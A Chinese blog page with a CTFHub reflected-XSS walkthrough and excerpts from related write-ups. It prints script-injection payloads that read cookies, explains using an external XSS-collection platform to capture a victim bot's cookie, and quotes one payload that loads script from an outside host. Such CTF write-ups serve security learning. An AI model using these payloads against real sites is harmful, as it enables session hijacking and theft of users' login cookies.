CTFHUB XSS反射型

最新推荐文章于 2024-04-11 16:47:57 发布
最新推荐文章于 2024-04-11 16:47:57 发布
阅读量402 收藏 1
点赞数
分类专栏: web做题记录
原文链接:https://blog.csdn.net/solitudi/article/details/107544165?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161754183516780266223396%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=161754183516780266223396&biz_id=0&utm_mediu
版权

在这里插入图片描述
查看是否能弹框

<script>alert("xss")</script>

在这里插入图片描述
尝试弹出自己的cookie发现是空的

<script>alert(document.cookie)</script>

在这里插入图片描述
后面发现只能通过下面的输入框来执行XSS测试,于是我们只能用XSS测试平台解决问题
注册一个xss平台,然后再创建一个项目
在这里插入图片描述
项目名称随便填写,勾选默认模块就够了,点击下一步
这时会出现一个找个将代码复制在这里插入图片描述
回到题目,将代码复制点击发送
在这里插入图片描述
回到xss平台:
在这里插入图片描述
在这里插入图片描述
补充:
XSS测试平台使用教程

_pain_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss跨站攻击脚本概述
xu_1234567的博客
10-28 316
1.XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 xss攻击分为三类: (1)持久跨站(存储xss ):最直接的危害类,跨站代码存储在服务器(数据库) (2)非持久跨站(反射xss):反射跨站脚本漏洞,最普
CTFHUB-WEB-XSS-反射
weixin_43486981的博客
08-13 3707
CTFHUB-WEB-XSS-反射知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话 类: DOM。属于反射的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射。需要攻击者提前构造一个恶意链接来诱使客户点击。 防
CTFHUB-技能树-Web题-XSS-反射
最新发布
Static______的博客
04-11 1255
参考链接:https://blog.csdn.net/weixin_43486981/article/details/107974878。特点:能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。输入admin后,会在页面显示,猜测可以通过该输入,改变页面内容。根据提示,把XSS平台给出的代码复制到第一个输入框中进行注入。提交后,在第二个框中访问第一个框注入XSS脚本后的网址。XSS platform平台,在上面注册一个账号。提交后,在XSS平台查看注入结果。
CTFHub | 反射
尼泊罗河伯的博客
12-16 330
检查网页显示内容发现有一个输入框以及一个提交表单。可以在这个输入框中输入你的名字并提交。第二个输入框是发送构造好的 XSS 链接给机器人模拟执行。一般情况下,在一个网页中有一个输入框并且带有一个提交表单的,就有可能含有 XSS 漏洞。
[ctfhub]-xss详解
weixin_52116519的博客
04-28 4901
1、明确cookie的作用 当你登录账号密码,服务端就会给你一个cookie,这样你在这个平台上的操作就带上了cookie来验证身份,而不用每一次操作都要你登录账号密码。cookie相当于每个人的登录凭证,如果得到了别人的cookie,特别是管理员的,我们将可以不用输账号密码,直接登录,从而获取管理员权限。 2、XSS的目的 获取别人的cookie。 Web渗透测试之XSS攻击:反射XSS 获得cookie的方法:我们在有XSS漏洞的搜索栏中输入<script>alert(document.c
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
XSS反射步骤1
08-08
XSS反射步骤1
web漏洞xss反射实战挖洞
08-31
文档
反射xss攻击代码.rar
05-14
xss攻击(java实现反射xss攻击,发送链接诱骗点击,编写服务端获取客户端的cookie信息)
网络安全原理与应用:反射XSS攻击演示.pptx
05-16
反射XSS攻击演示;;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;反射XSS攻击演示;...
题解记录-CTFHub技能树|Web|XSS,文件上传
weixin_57448435的博客
09-15 771
xss平台使用,修改后缀名、文件头、双写绕过,%00截断,.htaccess文件理解,bp与蚁剑工具的使用
CTFhub 反射
plant1234的博客
06-05 407
反射: 根据题目启动环境: 得到: 首先在第一个框中能进行无过滤的xss代码注入, 在第二个框可以进行访问url地址 更具大佬博客:https://blog.csdn.net/weixin_43486981/article/details/107974878 发现,中题的基本思路是在第一个框进行playload插入,在第二个访问插入的playload代码, 看大佬的博客发现,提供xss注入代码的平台:xsscom.com//index.php?do=login 进入平台,注册用户,创建一个简单的xss
CTFHub——XSS
2302_79119987的博客
03-28 868
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
CTFHUB------XSS反射(WP)
热门推荐
Y4tacker的博客
07-23 1万+
文章目录前言XSS测试平台 前言 一开始我直接在上面写js脚本发现出错,最后发现只能通过下面的输入框来执行XSS测试,于是我们只能用XSS测试平台解决问题 XSS测试平台 注册一个XSS测试平台 这里随便填写 勾选默认模块就够了,点击下一步 这时会出现一个找个将代码复制 拼接到网站后缀name后面,点击send 这时平台会收到一个记录点开即可 得到flag ...
CTFhub 反射xss
luminous_you的博客
12-06 1065
查看是否能弹框 尝试弹出自己的cookie发现是空的 XSS平台 第一个输入框 <sCRiPt/SrC=//xs.sb/T391>//可以看到图片中下面那个是我们的,没有cookie 第二个输入框复制url输入,他第二个输入框是将url发送给了机器人(相当于管理员,这样我们就获取到了管理员的cookie)//图片上面那个是机器人的cookie中含有flag http://challenge-6d1eed70035be632.sandbox.ctfhub.com:10080/?name=%
CTFHub-XSS-反射
m_de_g的博客
07-27 365
** CTFHub-XSS-反射 ** http://challenge-413363e656833f13.sandbox.ctfhub.com:10800/?name=<script>alert(1)</script> 看到URL直接,在后面加上<script>aler(1)</script> 通过上述实验,发现确实存在反射XSS,接下来拿cookie <script>alert(document.cookie)</script&g
CTFHUB xss 反射
yzl_007的博客
08-12 772
CTFHUB xss 反射 跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。能注入恶意的HTML/JavaScript代码到用户浏览器网址上,从而劫持会话。 类 DOM。属于反射的一种,利用非法输入来闭合对应的html标签。数据流向是URL→浏览器。 存储。危害大。相关源代码存放于服务器,用户浏览该页面时触发代码执行。 反射。需要攻击者提前构造一个恶意链接来诱使客户点击。 wp 测试 成功弹窗,存在xss 在第二个输入框复制url发送,返回成功
反射XSS绕过案例总结
zaqwescsdn的博客
06-26 1450
1.查看< / "等字符的过滤情况如果没有,直接X。 什么都没过滤的入门情况2.考虑用&#x的形式代替,如果没有过滤& # 理论上可以代替任意字符,但是一般都会将&过滤为&amp。 输出在<script></script>之间的情况//这里构造的代码没懂 输出在HTML属性里的情况3.gbXXXX系列的可以考虑使用宽字符%c0杀掉双引号,可能是因为过滤的正则写的有问题。 宽字节复仇记 [Q
ctfhub xss
09-19
引用和引用[2]中提到的CTFHUB-XSS是一种攻击技术,通过构造恶意链接或在存在XSS漏洞的地方注入恶意脚本来获取用户的cookie信息。攻击者可以通过诱使受害者点击带有恶意脚本的链接,从而在自己搭建的XSS平台上记录下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值